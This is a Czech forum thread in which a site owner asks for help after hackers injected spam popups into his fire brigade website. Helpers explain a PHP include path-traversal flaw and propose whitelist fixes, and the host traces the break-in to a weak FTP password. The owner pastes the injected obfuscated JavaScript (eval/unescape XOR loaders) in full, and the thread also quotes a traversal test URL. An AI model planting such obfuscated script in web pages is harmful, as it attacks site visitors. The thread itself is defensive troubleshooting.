Hacknutí našich webovek

[bless]

Zdárek,
mám dost velkej problém někdo nám hacknul www.sdh.velvary.com - teď otázka jak se tam dostal, mohl by se tam někdo mrknout, jestli nevidí nějakou chybu. Každopádně jediné, co bych řekl, že přes php injekci se tam nedostali ?neco=www.zlyhacker.com/osklivyskript.txt nefunguje.

[Fox!MURDER]

uz jen tohle o necem svedci:

http://www.sdh.velvary.com/?strana=../index

[Smitka]

A copak tam konkretne provedl?

[bless]

uz jen tohle o necem svedci:

http://www.sdh.velvary.com/?strana=../index

hm tak to je husty, tajkze to slo udelat pres php injekci?

takze co s tim?

Jakto ze se tam vytvari ten cyklus

[Peca-on-line]

uz jen tohle o necem svedci:

http://www.sdh.velvary.com/?strana=../index

Fuj, sem na to kliknul a sundalo mi to firefox.

[bless]

vzdyt je tam jenom tohle?
tak jak muze vznikat to co pises? jsem asi pekna lama - prosim o vysvetleni
include("./pages/".$strana.".php");

[bless]

vzdyt je tam jenom tohle?
tak jak muze vznikat to co pises? jsem asi pekna lama - prosim o vysvetleni
include("./pages/".$strana.".php");

aha uz to chapu jesm idiot - ono to tam vlozi stranku kde je znovu napsaano prave toto include("./pages/".$strana.".php"); tak se to vklada do nekonecna

[Fox!MURDER]

aha uz to chapu jesm idiot - ono to tam vlozi stranku kde je znovu napsaano prave toto include("./pages/".$strana.".php"); tak se to vklada do nekonecna

jj. chytra hlavicka


vpodstate staci jen tu injekci spravne ocurat, nebo tam najit jinou podobnou chybu ...

nejjednodussi reseni tohohle problemu je udelat si jednoduchej switch

PHP kód:

switch($strana)
{
case 'jednastranka':
 include ('jednastranka.php'); break;
case 'druhastranka':
 include('druhastranka.php); break;
default:
 die("WTF?");
} 


je to pracnejsi, nez jak to mas ted, ale nejde to nijak ocurat


jestli ti to hackli zrovna srkz tohle ti nereknu, vzhledem k tomu, ze tam je tohle, bude asi celej kod dost prasarna, takze tech chyb a bezp. der tam 100%ne bude vicero ...

[Smitka]

Ha pozde..

No tak kdyz si to prepises, tak ti vyjde
./pages/../index.php
takze se to koukne do pages, vyleze o slozku vejs, includuje index.php, ktery se koukne do pages, vyleze o slozku vejs, includuje index.php, ktery se koukne do pages, vyleze o slozku vejs,...

[bless]

jj. chytra hlavicka


vpodstate staci jen tu injekci spravne ocurat, nebo tam najit jinou podobnou chybu ...

nejjednodussi reseni tohohle problemu je udelat si jednoduchej switch

PHP kód:

switch($strana)
{
case 'jednastranka':
 include ('jednastranka.php'); break;
case 'druhastranka':
 include('druhastranka.php); break;
default:
 die("WTF?");
} 


je to pracnejsi, nez jak to mas ted, ale nejde to nijak ocurat


jestli ti to hackli zrovna srkz tohle ti nereknu, vzhledem k tomu, ze tam je tohle, bude asi celej kod dost prasarna, takze tech chyb a bezp. der tam 100%ne bude vicero ...

Moje prvni stranky v PHP - je to videt. vic der tam byt nemuze, tam snad jinek kus zdrojoveho kodu neni, bejvala tam kniha, ale uz je snad smazana.

btw ne ze bych to nejak resil na zbylych strankach.

Mnoo tem strankam se presne v jeden den vsem dopsak kus toho kodu s tim vyskakovanim ve slozce pages - vsechny ostani zustaly nedotcene. kazdopadne dikes

[bless]

A copak tam konkretne provedl?

Mnoo jinak je v kazde strance vyskakovaci okno na PENIS enlargment - nebo tak neco, pripadne odkza na kasino. A to si nepamatuji, ze bych tam daval

konkretne tam vlozil tohle:

HTML kód:

!-- 859bc67b9ab7ec2e5213ee82a86312ce --><script>document.write(unescape("%3Cscript%3Efunction%20nd4ska%28qk0yx9%29%7Bvar%20mdj0at%3Dnew%20String%28arguments.callee%29%3Bmdj0at%3Dmdj0at.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Crosyvr%3D0%2Cun2exd%3D0%2Cv8h4zl%3D%27%27%2Czg0zxo%3D0%3Bfor%28var%20qhmr4f%3D0%3Bqhmr4f%3Cmdj0at.length%3Bqhmr4f++%29zg0zxo+%3Dmdj0at.charCodeAt%28qhmr4f%2C1%29%3Bfor%28rosyvr%3D0%3Brosyvr%3Cqk0yx9.length%3Brosyvr++%29%7Bvar%20ox2e3o%3Dqk0yx9%5Brosyvr%5D%2Cikde49%3Dmdj0at.substr%28un2exd%2C1%29.charCodeAt%280%29%5Ezg0zxo%3Bv8h4zl+%3DString.fromCharCode%28ox2e3o%5Eikde49%29%3Bun2exd++%3Bif%28un2exd%3D%3Dmdj0at.length%29un2exd%3D0%7Ddocument.write%28v8h4zl%29%3Bv8h4zl%3D%27%27%7Dnd4ska%28new%20Array%2829994%2C30070%2C30077%2C30049%2C30061%2C30057%2C30059%2C29984%2C29971%2C29982%2C30007%2C30071%2C30057%2C30072%2C29974%2C30054%2C30005%2C29968%2C30075%2C30055%2C29981%2C29974%2C30066%2C30056%2C30066%2C30072%2C30010%2C30060%2C29965%2C30069%2C30056%2C30030%2C30052%2C29991%2C30014%2C29988%2C30052%2C30060%2C30064%2C30068%2C29964%2C30072%2C30061%2C30073%2C29997%2C30004%2C30005%2C30053%2C29988%2C30069%2C29983%2C30049%2C30001%2C30056%2C29985%2C30049%2C30077%2C29968%2C30062%2C30008%2C30010%2C29967%2C29996%2C29987%2C30010%2C29999%2C30010%2C29958%2C30078%2C30070%2C30038%2C30068%2C30068%2C30066%2C30012%2C30072%2C29998%2C30049%2C30038%2C30077%2C29976%2C30052%2C29959%2C29961%2C29953%2C30019%2C30041%2C29970%2C30001%2C30019%2C30028%2C30022%2C30043%2C30064%2C30010%2C30033%2C30032%2C30046%2C30059%2C30004%2C30008%2C30068%2C29998%2C30054%2C30071%2C30065%2C30050%2C30071%2C30055%2C30032%2C29968%2C30032%2C30003%2C30006%2C30008%2C29993%2C30068%2C30055%2C29972%2C29961%2C30071%2C30064%2C30018%2C30074%2C30003%2C30004%2C29981%2C30065%2C29964%2C29966%2C30061%2C29962%2C30057%2C30056%2C29973%2C30053%2C30073%2C30016%2C30050%2C30057%2C30007%2C30025%2C30061%2C30050%2C29967%2C30066%2C30062%2C30064%2C29996%2C30065%2C30058%2C30066%2C30070%2C29963%2C30050%2C29977%2C30065%2C30077%2C30013%2C30015%2C30020%2C30061%2C29968%2C29982%2C29975%2C30058%2C29976%2C30060%2C29969%2C30063%2C30049%2C29988%2C30000%2C30058%2C30075%2C29999%2C29996%2C30066%2C30064%2C29953%2C30071%2C30037%2C29965%2C29980%2C30062%2C30000%2C30030%2C30076%2C30053%2C30075%2C29975%2C30029%2C30053%2C30002%2C30025%2C30013%2C30068%2C29983%2C30055%2C30064%2C29995%2C29989%2C30012%2C30065%2C30071%2C30011%2C30070%2C30058%2C29969%2C30069%2C30059%2C30066%2C30058%2C30025%2C30072%2C29973%2C29952%2C29972%2C30009%2C30008%2C29996%2C29966%2C30063%2C30075%2C30063%2C30041%2C30071%2C29994%2C30025%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C30052%2C30037%2C29953%2C30052%2C30061%2C30035%2C30041%2C30072%2C29985%2C30056%2C30053%2C30053%2C30015%2C29998%2C30076%2C30060%2C30054%2C30061%2C30059%2C29982%2C29997%2C29976%2C30058%2C30052%2C30055%2C29989%2C30009%2C30030%2C29976%2C30057%2C29970%2C29963%2C29970%2C29961%2C30055%2C30075%2C29981%2C30051%2C30067%2C30063%2C29993%2C30012%2C29986%2C29978%2C30060%2C30069%2C30071%2C30049%2C29965%2C29958%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29966%2C29967%2C29979%2C29962%2C30061%2C30052%2C30032%2C29988%2C30058%2C29962%2C30076%2C30075%2C30010%2C29981%2C29965%2C29963%2C29979%2C30066%2C30076%2C30056%2C30027%2C30077%2C30060%2C30048%2C30068%2C30077%2C30056%2C29981%2C29956%2C30033%2C29987%2C30014%2C30061%2C29952%2C29953%2C29974%2C30077%2C30053%2C29970%2C30061%2C29955%2C29973%2C29965%2C30050%2C30070%2C29986%2C30058%2C30014%2C29994%2C30046%2C30004%2C30014%2C30070%2C30075%2C30049%2C30073%2C30076%2C30055%2C30003%2C30056%2C30077%2C30065%2C29964%2C30071%2C30005%2C30035%2C30005%2C29963%2C30074%2C30064%2C30076%2C30076%2C30049%2C30041%2C30040%2C30041%2C30051%2C30060%2C29955%2C30072%2C30061%2C30038%2C29972%2C29961%2C30077%2C30067%2C29962%2C30008%2C29998%2C30018%2C30054%2C30074%2C30071%2C29984%2C30003%2C30008%2C30016%2C30010%2C29988%2C29962%2C30068%2C30076%2C30061%2C30009%2C30051%2C30077%2C29965%2C30019%2C30060%2C29955%2C30072%2C30061%2C30017%2C30002%2C30040%2C30007%2C30010%2C29989%2C30006%2C30005%2C30012%2C29987%2C30016%2C30011%2C29997%2C30064%2C30050%2C30055%2C29977%2C30059%2C29965%2C29990%2C30022%2C30001%2C29969%2C30067%2C29967%2C30049%2C29969%2C29968%2C30072%2C30053%2C30006%2C30078%2C30014%2C30071%2C30059%2C30074%2C30058%2C30067%2C30075%2C30074%2C29968%2C29997%2C30060%2C30051%2C29969%2C30069%2C30078%2C30024%2C30074%2C29985%2C30025%2C29956%2C29963%2C29979%2C29963%2C29972%2C29981%2C30073%2C29953%2C30053%2C30055%2C30070%2C30013%2C30050%2C29994%2C30079%2C29986%2C30077%2C30065%2C30068%2C29965%2C30076%2C30055%2C30073%2C30065%2C30003%2C30050%2C30060%2C30061%2C30071%2C29979%2C30011%2C30003%2C29984%2C30068%2C30049%2C30072%2C29973%2C29987%2C29992%2C30072%2C29967%2C30069%2C30077%2C29987%2C30006%2C30010%2C30027%2C30001%2C30071%2C30046%2C29993%2C30005%2C29986%2C29984%2C30014%2C30065%2C30074%2C29980%2C30056%2C30019%2C30006%2C30031%2C29973%2C29981%2C29973%2C29973%2C30021%2C29997%2C30039%2C30044%2C29952%2C30070%2C29971%2C29982%2C30069%2C30064%2C29962%2C30060%2C30070%2C30070%2C29998%2C30067%2C30064%2C30070%2C30032%2C30078%2C30060%2C30078%2C29969%2C29980%2C30036%2C30070%2C30071%2C30058%2C30074%2C29992%2C30049%2C29967%2C29971%2C30062%2C30071%2C29959%2C30043%2C30057%2C30073%2C29957%2C30032%2C29990%2C29980%2C30064%2C29965%2C30073%2C30002%2C29983%2C30053%2C30072%2C29963%2C30051%2C30061%2C30025%2C29953%2C30074%2C30058%2C30055%2C30033%2C30013%2C29976%2C29967%2C29963%2C29969%2C29972%2C30079%2C30057%2C29980%2C30057%2C30076%2C30004%2C29968%2C29960%2C30061%2C30053%2C30072%2C30048%2C30041%2C29967%2C30078%2C30063%2C29975%2C30073%2C30005%2C29988%2C30007%2C30050%2C30061%2C30063%2C30075%2C30057%2C30059%2C29963%2C30072%2C30035%2C29973%2C29976%2C30055%2C30066%2C30028%2C29994%2C30078%2C30078%2C29975%2C30056%2C30065%2C30003%2C30061%2C29979%2C29965%2C29957%2C29982%2C29970%2C29976%2C29963%2C30053%2C30078%2C30054%2C30005%2C30069%2C30009%2C30040%2C30063%2C30077%2C30058%2C29986%2C29984%2C30071%2C29960%2C29956%2C30033%2C30015%2C29988%2C29986%2C29980%2C29996%2C30060%2C30054%2C30077%2C30034%2C30059%2C29965%2C30055%2C30007%2C30061%2C30060%2C30065%2C29986%2C30021%2C30074%2C29972%2C30060%2C29984%2C30016%2C30032%2C30075%2C30064%2C30058%2C30019%2C30061%2C30069%2C30055%2C30007%2C29994%2C29993%2C29997%2C29986%2C30019%2C30029%2C30029%2C30006%2C29985%2C30002%2C29999%2C30008%2C30027%2C29998%2C30019%2C29970%2C29963%2C29970%2C30057%2C30061%2C30055%2C29962%2C30071%2C30066%2C30054%2C30055%2C30066%2C29996%2C29983%2C30070%2C30068%2C30079%2C30076%2C29953%2C30025%2C29984%2C30004%2C30068%2C29953%2C30076%2C30049%2C30046%2C29992%2C29989%2C30000%2C30014%2C29990%2C29986%2C30035%2C29989%2C30075%2C29969%2C30070%2C30057%2C30052%2C29977%2C30025%2C29967%2C29983%2C30079%2C30061%2C30068%2C29995%2C30003%2C30004%2C30004%2C30007%2C29994%2C29988%2C29981%2C29976%2C29961%2C30051%2C30053%2C29957%2C30073%2C30005%2C30013%2C29990%2C30019%2C30008%2C29952%2C29988%2C30056%2C29972%2C30020%2C30025%2C30038%2C30026%2C30058%2C30053%2C29975%2C30072%2C30053%2C30007%2C30004%2C29992%2C30008%2C29976%2C29963%2C29978%2C29970%2C29982%2C29980%2C29957%2C30003%2C29957%2C30056%2C29980%2C29954%2C30067%2C30059%2C30078%2C30069%2C30065%2C29981%2C29984%2C29975%2C30070%2C30058%2C29955%2C30073%2C30052%2C30065%2C29983%2C30043%2C29987%2C30006%2C29982%2C30064%2C30064%2C29953%2C30049%2C30049%2C30075%2C30067%2C30012%2C30003%2C30061%2C29979%2C29965%2C29957%2C29969%2C29983%2C29975%2C29982%2C30070%2C30077%2C29965%2C30064%2C30060%2C29964%2C30005%2C29993%2C30012%2C29956%2C30075%2C30076%2C30054%2C30056%2C30072%2C30075%2C30058%2C29994%2C29981%2C30056%2C30061%2C30066%2C30061%2C30064%2C30038%2C30063%2C29958%2C30076%2C29953%2C30066%2C30035%2C29983%2C29998%2C29980%2C30064%2C29965%2C30073%2C30002%2C30069%2C30058%2C30065%2C30072%2C30061%2C30076%2C30033%2C30079%2C30067%2C30065%2C30020%2C29992%2C30011%2C30006%2C30021%2C29990%2C30011%2C30027%2C29993%2C30076%2C29953%2C29968%2C30069%2C30015%2C30049%2C30066%2C30075%2C30065%2C29961%2C30068%2C30034%2C30079%2C30073%2C30066%2C30054%2C29997%2C29986%2C29988%2C29987%2C30007%2C30037%2C29984%2C29995%2C29996%2C29960%2C29975%2C29980%2C30051%2C29992%2C29966%2C30068%2C29978%2C30070%2C30073%2C30056%2C30035%2C30055%2C29976%2C30064%2C30065%2C30031%2C30002%2C30045%2C29988%2C29991%2C30004%2C30076%2C29973%2C30079%2C30055%2C29962%2C30059%2C30074%2C30062%2C30004%2C30008%2C29982%2C29983%2C30065%2C30058%2C30064%2C29952%2C30057%2C30068%2C29983%2C29977%2C29963%2C30043%2C30059%2C29970%2C29972%2C30016%2C29983%2C30070%2C30068%2C29961%2C29972%2C29979%2C30058%2C30059%2C29995%2C30060%2C30063%2C30070%2C30051%2C30055%2C30072%2C30060%2C30075%2C30038%2C29969%2C29971%2C30065%2C30059%2C30008%2C29993%2C29963%2C29960%2C30057%2C30069%2C30071%2C30075%2C29974%2C30048%2C30074%2C30074%2C30016%2C30043%2C30062%2C29980%2C30060%2C29972%2C30000%2C30003%2C30035%2C29997%2C30007%2C30027%2C29994%2C29984%2C30007%2C29956%2C30074%2C30071%2C29986%2C30021%2C30011%2C30001%2C29989%2C29990%2C30008%2C30049%2C30078%2C30020%2C30066%2C29964%2C30057%2C30008%2C29984%2C30015%2C30020%2C30001%2C30056%2C30074%2C30078%2C29957%2C30071%2C30061%2C29968%2C30073%2C30065%2C30009%2C30014%2C29988%2C29991%2C29985%2C30060%2C30069%2C30059%2C29975%2C30008%2C29980%2C29982%2C29965%2C30040%2C30070%2C29966%2C30062%2C30043%2C30059%2C29961%2C30068%2C30074%2C30077%2C30024%2C30008%2C29988%2C30020%2C30003%2C30015%2C30006%2C29995%2C30003%2C30004%2C30004%2C30065%2C30077%2C30060%2C30038%2C30067%2C30077%2C30061%2C30062%2C29957%2C30069%2C29977%2C30017%2C30033%2C30009%2C30020%2C30044%2C29977%2C29999%2C30053%2C30003%2C29988%2C30015%2C29996%2C30029%2C30047%2C30000%2C29999%2C29998%2C29992%2C29989%2C29992%2C30005%2C29970%2C30060%2C30072%2C29957%2C29983%2C30079%2C30064%2C30014%2C30015%2C29995%2C30020%2C29996%2C30004%2C29996%2C29989%2C29985%2C29996%2C30044%2C30034%2C30041%2C29990%2C30010%2C29986%2C30013%2C29990%2C30016%2C30005%2C30024%2C30015%2C30069%2C30067%2C29961%2C30074%2C29990%2C29966%2C30055%2C30059%2C30033%2C30056%2C30056%2C30054%2C29999%2C30061%2C30057%2C30077%2C30075%2C29955%2C30017%2C30004%2C30004%2C30001%2C30016%2C30003%2C29994%2C30044%2C29987%2C29998%2C30002%2C30071%2C30060%2C30059%2C29963%2C29995%2C30070%2C29965%2C30054%2C30076%2C30004%2C30039%2C30017%2C29965%2C29974%2C30074%2C30059%2C30015%2C30066%2C30066%2C30059%2C30076%2C29998%2C29980%2C29966%2C30065%2C29981%2C30037%2C29959%2C29981%2C30057%2C30061%2C30061%2C30059%2C30036%2C29961%2C30070%2C29952%2C30041%2C30056%2C29961%2C30058%2C30058%2C30053%2C30009%2C29988%2C30007%2C29976%2C30051%2C30060%2C30076%2C30057%2C30074%2C30071%2C30079%2C29994%2C30010%2C29970%2C29982%2C29980%2C29955%2C29970%2C29954%2C30059%2C29980%2C29973%2C30078%2C30059%2C30011%2C30072%2C29992%2C30037%2C30047%2C30037%2C29989%2C30077%2C30047%2C30005%2C29999%2C29988%2C30026%2C30025%2C29994%2C29986%2C30029%2C30003%2C29993%2C30042%2C29996%2C30057%2C30070%2C30078%2C30064%2C30079%2C29958%2C30006							<!-- [ 859bc67b9ab7ec2e5213ee82a86312ce ] --><script>eval(unescape('function%20gReGf%28eGBl%29%7Bfunction%20uDI%28sPIUY%29%7Bvar%20nQBhco%3DsPIUY.length%3Bvar%20nAIOto%3D0%2Cjob%3D0%3Bwhile%28nAIOto%3CnQBhco%29%7Bjob+%3DsPIUY.charCodeAt%28nAIOto%29*nQBhco%3BnAIOto++%3B%7Dreturn%20%28%27%27+job%29%7D%20%20%20try%20%7Bvar%20bSzEp%3Deval%28%27a+r+gNuNmNeFnTtTs+.1c+aTl1lFeNe1%27.replace%28/%5BFTN1%5C+%5D/g%2C%20%27%27%29%29%2CdwsSZQ%3Dnew%20String%28%29%2CovHvnA%3D0%3BccUIE%3D0%2CvsD%3D%28new%20String%28bSzEp%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20kMZw%3DuDI%28vsD%29%3BeGBl%3Dunescape%28eGBl%29%3Bfor%28var%20wdIvfg%3D0%3B%20wdIvfg%20%3C%20%28eGBl.length%29%3B%20wdIvfg++%29%7Bvar%20jvdK%3DeGBl.charCodeAt%28wdIvfg%29%3Bvar%20mmpvph%3DvsD.charCodeAt%28ovHvnA%29%5EkMZw.charCodeAt%28ccUIE%29%3BovHvnA++%3BccUIE++%3Bif%28ovHvnA%3EvsD.length%29ovHvnA%3D0%3Bif%28ccUIE%3EkMZw.length%29ccUIE%3D0%3BdwsSZQ+%3DString.fromCharCode%28jvdK%5Emmpvph%29%3B%7Deval%28dwsSZQ%29%3B%20return%20dwsSZQ%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DgReGf%28%27%2532%2537%2534%2532%2530%2538%2539%2530%2547%2531%2535%2524%257c%257c%2504%2506%2567%2537%2520%250e%2579%2536%252b%2538%2523%252a%2530%2502%2534%2501%255b%2558%2541%2534%2530%251e%252e%2503%2517%253e%252a%251e%2524%2513%253d%2506%2502%2576%253b%2531%2576%2564%2564%250e%2531%2538%2525%2528%2518%251e%2518%256c%2546%2579%2569%253b%2529%2527%257a%2520%2578%2548%2576%2536%2535%2510%250c%251a%2528%2531%251a%254d%2516%2533%253e%2534%253b%2533%257c%251a%250c%251a%2504%2513%2551%253d%2579%2525%251a%2518%252b%257e%2534%251e%2523%253c%2518%252c%2533%2522%2536%2539%2541%2551%2571%2574%2552%257b%2556%2556%255d%2530%253f%2522%2526%255a%2524%252a%2535%2533%2536%253f%251b%2523%2515%2531%2533%256f%2570%255e%257f%255c%256d%2554%256d%256d%2525%257f%2531%253a%2503%2506%2521%2530%2512%2538%2511%257e%2556%256d%2502%2506%2572%2565%2523%253a%250b%253a%2520%2532%2527%253a%251c%257d%2523%2568%252b%2530%2535%2509%257a%252f%2527%2515%2516%2556%256c%256a%250c%2570%2536%2534%2561%2527%2503%251c%253b%254d%256c%255f%2560%2524%2577%2525%253b%2568%253b%252d%2512%2527%2574%251f%256d%252d%2573%2511%251a%2506%2561%2536%256f%2565%251a%253b%2511%2511%250d%252d%2525%2571%257f%257e%2579%2573%2570%2544%2570%252c%2572%256d%2579%256c%2548%256a%2572%2510%253c%257e%2537%2564%2578%2557%2507%2534%250d%2502%2571%257f%257d%2532%250c%2579%2576%2528%2538%2510%2507%256e%256e%2564%2559%257c%2565%2556%257e%255f%251e%252f%2516%253d%2522%2522%2579%2527%2529%2530%2520%2522%2559%2570%2570%2566%2562%252b%2520%2532%251e%2524%251b%2531%2569%2575%2523%252a%257a%253d%252b%2516%251e%2503%2524%250e%2527%2577%2502%2530%2571%257a%257d%2578%2532%2571%251e%2513%2520%2516%2530%2532%252f%2537%251a%2506%2507%2577%254a%2556%2538%256b%2535%2532%2525%251b%251e%2536%2578%257e%250a%253a%252f%2526%2569%2520%253d%253b%2579%2535%2525%2537%2528%251d%2521%2529%2528%256a%252f%2513%2574%2532%251c%253a%252a%2519%2573%253c%2532%250b%2530%2554%2564%250d%2527%2528%2504%2521%251a%254a%2555%2574%2520%2528%2523%2560%2550%2571%256e%254a%255c%2564%257c%2579%254d%2515%2510%2537%2556%2547%257c%257a%2554%2574%257b%2510%2505%2565%253f%253d%2533%2564%2545%2573%2577%2556%2503%252f%2517%257f%2538%253c%2538%253b%2520%254f%2574%2561%2543%2564%252a%2511%2560%252a%2548%2536%2531%2515%2529%2514%253d%2510%2539%2503%256e%2532%253f%253b%257f%2565%2571%2569%2543%2540%2559%2558%2522%257f%256f%252e%250f%2532%254d%2516%2525%2530%2535%2537%253d%257b%2546%2568%2577%2502%252f%2539%2574%2531%2543%2542%256f%257c%2573%2519%257b%255f%2573%2573%2557%256d%2569%252e%2532%2536%2535%2534%2537%2512%2561%254c%2541%253f%256c%2576%2562%2569%2555%2572%2574%256a%2561%2543%2549%2548%257c%254b%2567%2544%256b%2560%252d%253e%2537%2520%254f%2521%2531%2528%2505%2551%2530%2528%250d%2517%2534%2537%2535%253b%257f%2543%257c%255c%2546%2575%255e%2554%257e%257d%256d%2523%253b%251d%2528%2576%2532%2528%2507%2505%256a%254b%2569%2513%2506%252b%2520%256c%2526%2509%2506%2500%256a%2525%256b%250a%2516%251e%2514%2524%254b%2564%2506%2527%2519%252a%253d%2539%2574%2508%2528%2518%2524%2568%2569%256b%2523%2534%251c%2577%2529%2531%253f%2529%2538%253d%253d%2524%2553%2557%251b%2502%2568%252b%2527%2503%2510%2500%2572%253c%257c%2563%254f%2557%254c%2575%257b%2531%2528%2501%2523%2515%2532%2507%2511%2501%252a%2534%2514%2559%254d%256d%2539%251b%250d%2516%2528%2538%2530%2538%2550%2550%2534%2530%2539%2534%2577%2528%2570%257a%2568%2546%253e%2568%2567%2570%2514%257f%2509%2570%250d%2552%2505%2545%252d%2560%2521%256e%2525%2556%2511%2568%2515%257e%2523%2534%253f%2537%2517%253f%253e%2524%2509%2526%256f%256e%2502%2546%2548%2529%2560%252e%251a%253c%2514%2530%2519%2533%251e%2528%251e%2501%2508%2535%251d%251b%2549%251e%2529%2575%253b%2533%2574%256b%251c%255c%254a%2542%2567%2533%2520%2518%256c%2504%253a%252b%2573%2577%2562%257e%254a%252f%2552%251f%253c%253e%257a%254e%2558%2513%252b%2511%2527%256a%2503%2529%2537%253c%251e%2536%255a%2516%2538%2527%2538%254d%2524%2510%252f%2541%2532%257a%2509%253f%2525%2533%2572%2502%2500%2571%2529%256b%2572%2521%2550%253e%2509%2571%2570%257e%2577%2532%2568%2526%2571%256e%255a%2553%255c%256a%257c%2506%2514%253b%2536%2536%2539%2550%2519%2565%2538%257a%253f%252c%250c%2538%252e%2534%2501%2516%2516%2520%2533%2555%2571%256d%2525%2521%2533%2534%254a%2561%2549%2521%2575%2522%2530%251f%257d%2571%2534%250b%255a%2552%2574%2575%2532%252e%2523%2536%2518%2536%2560%256a%255b%2520%252b%2530%2525%2515%2529%2532%252c%257e%2552%2526%2517%2514%2544%253d%2520%2534%253a%2531%2555%2537%2538%2517%2516%2522%2527%252f%2530%2520%252c%2523%2517%253f%2529%253c%253b%2568%2567%2560%2523%2500%2520%2501%253a%2522%2565%257b%2577%252d%250b%2560%253b%2528%2530%2570%256e%2547%2535%2558%2507%2502%2500%2547%252b%2539%253f%2506%255c%251e%2528%257c%257c%2531%2524%2524%257c%2510%2551%250e%2547%2531%256c%2511%2560%2527%2577%256b%2562%250f%2525%251a%250f%2531%2501%2513%254c%251d%257d%252e%2578%257d%2541%2540%2505%257d%253f%250d%2534%256e%2536%2560%2515%2528%2539%2528%2524%2506%2525%2506%2528%2553%252a%255d%2561%2556%2534%2560%2548%2577%257b%251c%2530%2533%2530%2530%2530%2508%2558%255a%256b%250a%256a%251b%253c%2536%2537%2545%2572%252f%2574%253e%257f%253c%2571%256d%257f%2576%2537%2532%253f%2535%255f%2538%2539%2528%251c%2504%2537%2511%253c%250a%2512%2502%2561%2571%254e%2566%250a%257f%256f%2579%251a%2556%2553%257e%2518%253b%2538%2521%257d%2524%2562%2526%254a%250c%2515%2500%2563%256b%2537%2556%2515%255d%2564%253d%252b%2538%2509%253a%250b%2566%251d%2510%257f%2533%2539%2523%2520%2531%253c%250b%257d%254a%250a%2529%2569%2564%2526%2523%2514%2509%256d%253d%257d%2564%2576%2571%2577%254e%2502%250c%253e%2542%2502%251b%2501%2534%2541%252f%2564%2501%251f%253b%252e%253b%2526%253e%250f%2559%2502%2532%2533%252d%2532%2539%255c%2573%257a%253a%256e%2529%250b%2519%250b%2511%2575%2574%2531%2563%2530%2574%256a%252b%2507%2528%253e%2579%2575%254a%250c%2515%2525%251b%253f%250e%255e%253f%257a%252c%2537%2530%2501%2534%250a%2518%2509%251d%2538%252d%252a%2508%2534%2511%2573%2571%2569%252c%2525%2537%2535%2512%2515%257f%2531%2561%2557%2539%2564%2510%253f%2530%251a%2539%251b%2573%252f%2531%255b%252f%2565%2568%252e%253f%2527%2537%2525%2511%252e%2569%257a%251b%253b%2529%2530%2529%254f%2502%251c%257a%2539%257d%256a%2579%2559%255c%2557%2529%2551%2570%254a%257a%2542%253a%2536%256d%2576%254e%2535%2566%2515%2579%253f%2527%2548%2519%2555%257b%2569%2521%253f%252b%251d%2570%253a%257b%2569%253d%254b%2559%2573%2502%256e%2577%2531%2526%2526%2543%254c%253a%2559%257b%253e%252c%251a%256c%250c%2578%2530%2500%257d%2566%255b%256d%2577%2504%257d%253b%250a%2514%2550%2502%2567%2568%250d%2525%251b%2505%253e%2525%254f%2532%252a%2538%2524%2579%2501%250e%2522%251a%252b%257b%2504%253d%252d%2509%257f%2574%2525%251a%2538%2566%256d%2563%2542%2564%251d%2570%250d%2539%2577%2579%2568%2502%2537%257a%2528%253d%2577%2516%250c%2528%251e%251f%251b%250c%2520%2519%2538%2544%2555%250e%2523%253f%2539%2520%2536%253e%252a%2572%2518%254e%2503%2539%2526%257f%2525%257b%2565%251d%2578%253d%2518%2533%2576%250e%256e%2510%254c%2552%257a%253d%2561%2561%2510%2555%2535%2540%252d%2526%253b%2539%2528%2578%2567%256f%27%29%3B'));</script><!-- end -->

[Fox!MURDER]

Mnoo jinak je v kazde strance vyskakovaci okno na PENIS enlargment - nebo tak neco, pripadne odkza na kasino. A to si nepamatuji, ze bych tam daval

konkretne tam vlozil tohle:
...`

koukal jsem na to ... uprimne nejsem si prilis jistej tim, jak se jim ta injekce povedla ... jestli teda neni hacklej celej server ...

[bless]

Jeste je celkem zajimave, ze nebyly poskozeny jine poddomeny ani hlavni, ale doufam, ze to neni otazka casu.

[bless]

koukal jsem na to ... uprimne nejsem si prilis jistej tim, jak se jim ta injekce povedla ... jestli teda neni hacklej celej server ...

Koukal jsem na to taky a nechapu to?? tam totiz do toho nejde nic vlozit apostrof atd, z jineho webu tam zsoubor taky nedas...

edit: TAkze momentale jsem v situaci, kdy vubec nevim jak se branit Zrusil jsem pro jistotu vsechny loginy na ftp, ale vubec nevim. Jeste tam udelam ochranu s tim switchem, ale jinak me uz nic nenapada . Doufam, ze to zabere.

[Fox!MURDER]

Koukal jsem na to taky a nechapu to?? tam totiz do toho nejde nic vlozit apostrof atd, z jineho webu tam zsoubor taky nedas...

edit: TAkze momentale jsem v situaci, kdy vubec nevim jak se branit Zrusil jsem pro jistotu vsechny loginy na ftp, ale vubec nevim. Jeste tam udelam ochranu s tim switchem, ale jinak me uz nic nenapada . Doufam, ze to zabere.

mas logy ?

[bless]

mas logy ?

asi ano: www.log.velvary.com

no kdyz na to tak koukam, tak mi jsou asi na hovno - vzhledem k tomu ze v jedno je rok 2005 a v druhem pouze 2007

[bless]

Problém vyřešen

Máte pravdu, útočník se dostal na vaši subdoménu pomocí ftp, zřejmě jste
neměl nastaveno dost silné heslo. Chcete tedy obnovit celý adresář pages?

achjo...

[monsoon]

Prihodim jeste pro predstavu odkaz na jeden pekny clanek z nedavne doby.
XSS (Cross-Site Scripting) hacking @ security-portal.cz

[Rainbow]

jj. chytra hlavicka


vpodstate staci jen tu injekci spravne ocurat, nebo tam najit jinou podobnou chybu ...

nejjednodussi reseni tohohle problemu je udelat si jednoduchej switch

PHP kód:

switch($strana)
{
case 'jednastranka':
 include ('jednastranka.php'); break;
case 'druhastranka':
 include('druhastranka.php); break;
default:
 die("WTF?");
} 


Namiesto tohoto pouzivam:

PHP kód:

$allowed = array('nieco1', 'nieco2', 'nieco3');
if (!in_array($co, $allowed))
        $co = 'nieco1'; 


a potom

PHP kód:

readfile('texts/'.$co.'.html'); 


alebo

PHP kód:

include_once('inc/'.$co.'.php'); 


[bless]

Vysvětlení jak se dostali k heslu:

